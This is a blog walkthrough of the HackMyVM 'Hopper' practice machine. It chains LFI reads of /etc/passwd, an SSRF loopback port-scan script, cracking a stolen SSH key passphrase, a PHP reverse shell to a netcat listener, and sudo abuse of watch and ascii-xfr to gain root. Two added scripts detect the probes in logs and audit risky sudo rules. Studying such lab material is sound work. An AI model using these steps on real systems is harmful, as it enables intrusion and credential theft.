Windy's little blog

All the odds and ends of life, and I like CTF.

HackMyVm Hopper Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Hopper

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                  
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 11:29 CST
 Nmap scan report for bogon (192.168.56.100)
 Host is up (0.00079s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 fc:84:7e:5d:15:85:4d:01:d3:7b:5a:00:de:a4:73:37 (RSA)
 |   256 54:f5:ea:db:a0:38:e2:c8:5a:db:30:91:3e:78:b4:b9 (ECDSA)
 |_  256 97:b6:b8:f7:cb:15:f5:6b:cd:92:5f:66:26:28:47:07 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Enum port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.z 403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 80]
 /javascript           (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
 /advanced-search      (Status: 301) [Size: 326] [--> http://192.168.56.100/advanced-search/]


Check /advanced-search: enter anything and click "Submit", and notice the URL becomes "http://192.168.56.100/advanced-search/path.php?path=xxx". Fuzz the path parameter for LFI.

 ~ wfuzz -u 'http://192.168.56.100/advanced-search/path.php?path=file://FUZZ' --hh 0  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000005:   200        227 L    1115 W     7224 Ch     "/etc/apache2/apache2.conf"
 000000001:   200        27 L     39 W       1439 Ch     "/etc/passwd"
 000000018:   200        12 L     88 W       664 Ch      "/etc/fstab"                                    
 ...
 000000188:   200        0 L      1 W        32064 Ch    "/var/log/faillog"
 000000224:   200        1 L      4 W        1151 Ch     "/var/run/utmp"
 000000220:   200        34 L     237 W      164321 Ch   "/var/log/wtmp"
 000000199:   200        0 L      1 W        292584 Ch   "/var/log/lastlog"


Get usernames from /etc/passwd.

 ~ curl 'http://192.168.56.100/advanced-search/path.php?path=file:///etc/passwd'         
 root:x:0:0:root:/root:/bin/bash
 ...
 edward:x:1000:1000:edward,,,:/home/edward:/bin/bash
 systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
 henry:x:1001:1001::/home/henry:/bin/bash


Write a Python script that enumerates ports on the target's localhost through the same path parameter.

 #!/usr/bin/python3
 import requests
 
 # Ask path.php to fetch every loopback port in turn: an empty body means
 # nothing answered on that port, any content means something is listening.
 for port in range(1, 65536):
     try:
         res = requests.get(
             f'http://192.168.56.100/advanced-search/path.php?path=http://127.0.0.1:{port}',
             timeout=5)
     except requests.RequestException:
         continue
     if res.text:
         print(f'port {port} is open.')


Port 2222 is open.

 ~ python3 enum.py   
 port 22 is open.
 port 80 is open.
 port 2222 is open.
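
As an added defender-side example that is not part of the walkthrough: the two probe shapes used above, file:// reads and http://127.0.0.1:PORT fetches through path.php, both land in the Apache access log and can be flagged there. The log lines are constructed, and the endpoint path and the finding labels are assumptions.

```python
"""Flag LFI/SSRF probes against path.php in Apache access log lines."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache common/combined log prefix: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')

VULN_PATH = '/advanced-search/path.php'  # assumed: the one endpoint of interest

def classify(url):
    """Label one request URL: 'lfi', 'ssrf-loopback', 'ssrf' or None."""
    parts = urlsplit(url)
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes, so http%3A%2F%2F127.0.0.1%3A2222 comes back as a URL
    for value in parse_qs(parts.query).get('path', []):
        target = value.strip().lower()
        if target.startswith(('file:', '/', '../')):
            return 'lfi'
        if target.startswith(('http://', 'https://', 'ftp://')):
            host = urlsplit(target).hostname or ''
            if host in ('localhost', '::1') or host.startswith('127.'):
                return 'ssrf-loopback'
            return 'ssrf'
    return None

def scan(log_text):
    """Return (ip, label, url) for every log line that carries a probe."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (label := classify(m['url'])):
            findings.append((m['ip'], label, m['url']))
    return findings

# Constructed sample lines modelled on the requests shown in the walkthrough.
SAMPLE_LOG = """\
192.168.56.1 - - [30/Aug/2021:11:40:01 +0800] "GET /advanced-search/path.php?path=hello HTTP/1.1" 200 1439
192.168.56.1 - - [30/Aug/2021:11:41:13 +0800] "GET /advanced-search/path.php?path=file:///etc/passwd HTTP/1.1" 200 1439
192.168.56.1 - - [30/Aug/2021:11:42:07 +0800] "GET /advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222 HTTP/1.1" 200 181
192.168.56.1 - - [30/Aug/2021:11:42:09 +0800] "GET /index.html HTTP/1.1" 200 80
"""

if __name__ == '__main__':
    for ip, label, url in scan(SAMPLE_LOG):
        print(f'{label:14s} {ip} {url}')
```

A burst of 'ssrf-loopback' hits with different ports from one client is the port sweep the script above produces.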


Check port 2222.

 ~ curl 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'     
 <!DOCTYPE html>
 <html>
 <body>
 
 <h1>[+] WARNING</h1>
 
 <p> - Private corporative web server</p>
 
 <p> - If you are non organization personal, leave immediately</p>
 
 
 </body>
 </html>


Fuzz dirs of port 2222.

 ~ gobuster dir -u 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'  -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt   -b 401,403,404,500 --wildcard   --exclude-length 181
 ==============================================================
 /backup               (Status: 200) [Size: 1751]
 ...


Get an id_rsa key from /backup. chmod 600 it, then bruteforce the key's passphrase.

 ~ /usr/share/john/ssh2john.py id_rsa  > hash.txt  
 & kali @ mykali in ~/Documents/hopper 0 [13:03:29]
 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt
 ...
 barcelona        (id_rsa)


Log in over SSH as user edward.

 ~ ssh edward@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/edward/.Xauthority does not exist
 edward@hopper:~$ id
 uid=1000(edward) gid=1000(edward) grupos=1000(edward),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)


Upload a PHP reverse shell and get a shell as www-data.

 ~ curl http://192.168.56.100/r.php 
 
 & kali @ mykali in ~/Documents/hopper 0 [13:07:35]
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:35698.
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  07:07:50 up  1:41,  0 users,  load average: 0.01, 0.02, 0.02
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)


Check sudo -l.

 www-data@hopper:/$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on hopper:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User www-data may run the following commands on hopper:
     (henry) NOPASSWD: /usr/bin/watch


Set the TERM environment variable, then escalate to user henry through watch.

 www-data@hopper:/$ export TERM=xterm-256color
 export TERM=xterm-256color
 www-data@hopper:/$ sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
 sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
 $ id
 id
 uid=1001(henry) gid=1001(henry) groups=1001(henry)


Upload id_rsa.pub to /home/henry/.ssh/, rename it to authorized_keys, and log in over SSH as user henry.

 ~ ssh henry@192.168.56.100 
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/henry/.Xauthority does not exist
 henry@hopper:~$ id
 uid=1001(henry) gid=1001(henry) grupos=1001(henry)


Check sudo -l.

 henry@hopper:~$ sudo -l
 Matching Defaults entries for henry on hopper:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User henry may run the following commands on hopper:
     (root) NOPASSWD: /usr/bin/ascii-xfr
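
As an added example that is not part of the walkthrough, this audits the two sudo -l listings above (www-data to henry via watch, henry to root via ascii-xfr) and flags passwordless rules on binaries that hand over a shell or a file write. The RISKY table and the merged sample listing are constructed assumptions.

```python
"""Parse sudo -l output and flag NOPASSWD rules on shell- or file-write-capable binaries."""
import re

# One rule line: "(runas[:group]) [TAG: ...] /path/to/cmd [args]"
RULE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+)(?P<args>.*)$')

# Binaries the walkthrough abuses (watch -x runs any command, ascii-xfr -r writes any file); assumed, not exhaustive.
RISKY = {
    '/usr/bin/watch': 'runs an arbitrary command as the runas user',
    '/usr/bin/ascii-xfr': 'writes an arbitrary file as the runas user',
}

def parse_sudo_l(text):
    """Return [(runas, tags, cmd, args)] from the rules section of sudo -l."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith('User ') and 'may run the following commands' in line:
            in_rules = True  # everything before this line is Defaults noise
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = [t.rstrip(':') for t in re.findall(r'\w+:', m['tags'])]
            rules.append((m['runas'], tags, m['cmd'], m['args'].strip()))
    return rules

def audit(text):
    """One finding per passwordless rule on a RISKY binary with unrestricted args."""
    findings = []
    for runas, tags, cmd, args in parse_sudo_l(text):
        # A rule that pins the arguments is not flagged; only an open argument list lets the user choose -x or -r.
        if 'NOPASSWD' in tags and cmd in RISKY and not args:
            findings.append(f'({runas}) NOPASSWD {cmd}: {RISKY[cmd]}')
    return findings

# Constructed sample: the two sudo -l listings from the box merged into one,
# plus an argument-pinned rule to show what is not flagged.
SAMPLE = """\
Matching Defaults entries for www-data on hopper:
    env_reset, mail_badpass,
User www-data may run the following commands on hopper:
    (henry) NOPASSWD: /usr/bin/watch
    (root) NOPASSWD: /usr/bin/ascii-xfr
    (root) /usr/bin/less /var/log/syslog
"""

if __name__ == '__main__':
    print('\n'.join(audit(SAMPLE)))
```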


Use ascii-xfr to write root's authorized_keys.

 henry@hopper:~$ sudo ascii-xfr -rv /root/.ssh/authorized_keys < .ssh/authorized_keys 
 ASCII download of "/root/.ssh/authorized_keys"
 
 0.6 Kbytes transferred at 565 CPS... Done.


Log in as root.

 ~ ssh root@192.168.56.100 
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /root/.Xauthority does not exist
 root@hopper:~# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 hopper



